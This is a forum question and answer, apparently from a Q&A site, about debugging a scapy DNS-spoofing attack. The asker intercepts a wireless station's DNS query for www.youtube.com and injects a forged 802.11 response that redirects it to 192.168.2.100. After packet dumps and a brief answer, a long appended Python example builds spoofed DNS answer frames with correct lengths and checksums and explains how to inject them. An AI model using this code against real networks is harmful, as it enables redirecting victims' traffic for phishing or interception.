I am using scapy to intercept DNS requests and forge responses. The intercept and forge parts work fine, and sending the forged packet seems to work too (at least I can see the dot indicating that sendp succeeded). However, on the target station I do not receive the packet, or at least I don't see it in Wireshark.
I don't know where my problem is, but I guess it is not in the DNS/UDP part (that packet is visible in Wireshark), so it is probably in the 802.11 or IP layer.
Here is a request:
192.168.2.117 (a4:4e:31:5c:54:78) -> 194.2.0.50 (00:14:d1:ad:9f:88)
DNS request for www.youtube.com.
###[ RadioTap dummy ]###
version = 0
pad = 0
len = 38
present = TSFT+Flags+Rate+Channel+dBm_AntSignal+b14+b29+Ext
notdecoded= ' \x08\x00\xa0 \x08\x00\x00\xc8+\xa3\x10\x00\x00\x00\x00\x10l\x9e\t\xc0\x00\xd5\x00\x00\x00\xcd\x00\xd4\x01'
###[ 802.11 ]###
subtype = 8L
type = Data
proto = 0L
FCfield = to-DS
ID = 11264
addr1 = 00:14:d1:ad:9f:88
addr2 = a4:4e:31:5c:54:78
addr3 = 00:25:9c:9a:aa:b1
SC = 4272
addr4 = None
###[ 802.11 QoS ]###
TID = 0L
EOSP = 0L
Ack Policy= 0L
Reserved = 0L
TXOP = 0
###[ LLC ]###
dsap = 0xaa
ssap = 0xaa
ctrl = 3
###[ SNAP ]###
OUI = 0x0
code = 0x800
###[ IP ]###
version = 4L
ihl = 5L
tos = 0x0
len = 61
id = 213
flags =
frag = 0L
ttl = 128
proto = udp
chksum = 0xb489
src = 192.168.2.117
dst = 194.2.0.50
\options \
###[ UDP ]###
sport = 50648
dport = domain
len = 41
chksum = 0x7b3c
###[ DNS ]###
id = 64118
qr = 0L
opcode = QUERY
aa = 0L
tc = 0L
rd = 1L
ra = 0L
z = 0L
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'www.youtube.com.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None
###[ Padding ]###
load = '\xb2\x17\xa3\x8a'
The forged response:
###[ RadioTap dummy ]###
version = 0
pad = 0
len = 38
present = TSFT+Flags+Rate+Channel+dBm_AntSignal+b14+b29+Ext
notdecoded= ' \x08\x00\xa0 \x08\x00\x00\xc8+\xa3\x10\x00\x00\x00\x00\x10l\x9e\t\xc0\x00\xd5\x00\x00\x00\xcd\x00\xd4\x01'
###[ 802.11 ]###
subtype = 8L
type = Data
proto = 0L
FCfield = from-DS
ID = 11264
addr1 = a4:4e:31:5c:54:78
addr2 = 00:14:d1:ad:9f:88
addr3 = 00:25:9c:9a:aa:b1
SC = 14272
addr4 = None
###[ 802.11 QoS ]###
TID = 0L
EOSP = 0L
Ack Policy= 0L
Reserved = 0L
TXOP = 0
###[ LLC ]###
dsap = 0xaa
ssap = 0xaa
ctrl = 3
###[ SNAP ]###
OUI = 0x0
code = 0x800
###[ IP ]###
version = 4L
ihl = 5L
tos = 0x0
len = None
id = 213
flags =
frag = 0L
ttl = 128
proto = udp
chksum = None
src = 194.2.0.50
dst = 192.168.2.117
\options \
###[ UDP ]###
sport = domain
dport = 50648
len = None
chksum = None
###[ DNS ]###
id = 64118
qr = 1L
opcode = QUERY
aa = 0L
tc = 0L
rd = 1L
ra = 1L
z = 0L
rcode = ok
qdcount = 1
ancount = 1
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'www.youtube.com.'
| qtype = A
| qclass = IN
\an \
|###[ DNS Resource Record ]###
| rrname = 'www.youtube.com.'
| type = A
| rclass = IN
| ttl = 900
| rdlen = 4
| rdata = '192.168.2.100'
ns = None
ar = None
###[ Padding ]###
load = '\xb2\x17\xa3\x8a'
I tried comparing against a valid DNS response, but I don't see any difference that would explain my problem. I tried modifying the ID and SC fields, but that doesn't change anything. addr3 doesn't change.
Do you see an error that explains why the target doesn't receive it?
Answer 0 (score: 0)
Well, the length of your IP response is 'None'. That isn't going to be handled well. :) That's the obvious thing. Also, even though you added data, the total length at the top hasn't changed.
I'm not sure what sport/dport = domain means; I assume those are port 53.
The IP ID field in the query and the response would normally differ, but that won't affect your result.
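The check the answer is asking for, as an added example that is neither the asker's code nor scapy's own: the frame is rebuilt with the standard library only, so every length and checksum that scapy fills in for fields left as None is computed explicitly and can then be verified on the exact bytes that would be injected. The query is a constructed sample built from the values shown in the dumps above (addresses, ports, transaction ID, qname; the duration field is set to 0 as an assumption), the response uses the same from-DS address mapping the post uses (addr1 = client, addr2 = BSSID, addr3 = the gateway MAC from the query's addr3), and the IP total length of the rebuilt query comes out at the 61 bytes the dump shows. The last function is what you would run on bytes(pkt) before calling sendp(); it also flags the 4-byte trailer that scapy displays as Padding, which sits outside the IP length and is copied into the forged response in the dump above.

```python
import socket
import struct

# Constructed sample values, taken from the dumps in the question.
CLIENT = bytes.fromhex("a44e315c5478")    # a4:4e:31:5c:54:78, the station
BSSID = bytes.fromhex("0014d1ad9f88")     # 00:14:d1:ad:9f:88, the AP
GATEWAY = bytes.fromhex("00259c9aaab1")   # 00:25:9c:9a:aa:b1, addr3 of the query
LLC_SNAP_IPV4 = bytes.fromhex("aaaa03" "000000" "0800")
QOS_DATA = 0x88               # FC byte 0: type=Data(2), subtype=8 (QoS)
TO_DS, FROM_DS = 0x01, 0x02   # FC byte 1 flags


def checksum(data):
    """RFC 1071 one's-complement sum, used for the IP header and the UDP pseudo-header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(data, off):
    labels = []
    while data[off]:
        n = data[off]
        labels.append(data[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels) + ".", off + 1


def ip_udp(src, dst, sport, dport, payload, ip_id):
    """IPv4 + UDP with explicit lengths and checksums (what scapy computes for len/chksum=None)."""
    udp_len = 8 + len(payload)
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0) + payload
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 17, udp_len)
    udp = udp[:6] + struct.pack("!H", checksum(pseudo + udp) or 0xFFFF) + udp[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, ip_id, 0, 128, 17, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:] + udp


def dot11_qos(fc_flags, addr1, addr2, addr3, seq):
    """24-byte 802.11 data header plus 2-byte QoS control; duration is 0 (assumption)."""
    return (struct.pack("<BBH", QOS_DATA, fc_flags, 0) + addr1 + addr2 + addr3
            + struct.pack("<H", seq << 4) + b"\x00\x00")


def build_query(qname="www.youtube.com.", txid=64118, sport=50648):
    """Constructed copy of the question's request: to-DS, addr1=BSSID, addr2=client, addr3=gateway."""
    dns = (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
           + encode_name(qname) + struct.pack("!HH", 1, 1))
    return (dot11_qos(TO_DS, BSSID, CLIENT, GATEWAY, 267) + LLC_SNAP_IPV4
            + ip_udp("192.168.2.117", "194.2.0.50", sport, 53, dns, 213))


def parse_query(frame):
    """Pull addressing and the DNS question out of a captured to-DS QoS data frame."""
    fc0, fc1 = frame[0], frame[1]
    if fc0 != QOS_DATA or not (fc1 & TO_DS) or (fc1 & FROM_DS):
        raise ValueError("not a to-DS QoS data frame")
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    body = frame[26:]
    if body[:8] != LLC_SNAP_IPV4:
        raise ValueError("not IPv4 over LLC/SNAP")
    ip = body[8:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    ip = ip[:total_len]   # bytes past IP.len (the 4-byte trailer scapy shows as Padding) are not payload
    if ip[9] != 17:
        raise ValueError("not UDP")
    sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])
    if dport != 53:
        raise ValueError("not a DNS query")
    dns = ip[ihl + 8:]
    txid = struct.unpack("!H", dns[:2])[0]
    qname, off = decode_name(dns, 12)
    qtype, qclass = struct.unpack("!HH", dns[off:off + 4])
    return {"bssid": addr1, "client": addr2, "gateway": addr3,
            "src": socket.inet_ntoa(ip[12:16]), "dst": socket.inet_ntoa(ip[16:20]),
            "sport": sport, "txid": txid, "qname": qname, "qtype": qtype,
            "qclass": qclass, "question": dns[12:off + 4]}


def build_response(query_frame, answer_ip, ttl=900, seq=892):
    """Forge the A answer: swap addresses, turn to-DS into from-DS, recompute every length/checksum."""
    q = parse_query(query_frame)
    if q["qtype"] != 1:
        raise ValueError("only A questions are answered here")
    # QR=1, RD=1, RA=1, rcode 0; one question, one answer whose name points back to offset 12.
    dns = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0) + q["question"]
    dns += struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(answer_ip)
    hdr = dot11_qos(FROM_DS, q["client"], q["bssid"], q["gateway"], seq)
    return hdr + LLC_SNAP_IPV4 + ip_udp(q["dst"], q["src"], 53, q["sport"], dns, 213)


def verify_frame(frame):
    """Run on bytes(pkt) before sendp(): lengths and checksums must agree with the actual bytes."""
    ip = frame[26 + 8:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    udp = ip[ihl:total_len]
    udp_len = struct.unpack("!H", udp[4:6])[0]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, 17, udp_len)
    return {"ip_len_matches": total_len == len(ip),     # False if a stale trailer follows the datagram
            "udp_len_matches": udp_len == len(udp),
            "ip_checksum_ok": checksum(ip[:ihl]) == 0,
            "udp_checksum_ok": checksum(pseudo + udp) == 0}
```

To inject the result with scapy you would wrap the bytes in a fresh header, for example RadioTap()/Dot11(build_response(frame, "192.168.2.100")), rather than reusing the captured RadioTap layer and its Padding; whether the station accepts an unencrypted injected data frame still depends on the network (an encrypted WLAN will discard it), which this check cannot tell you.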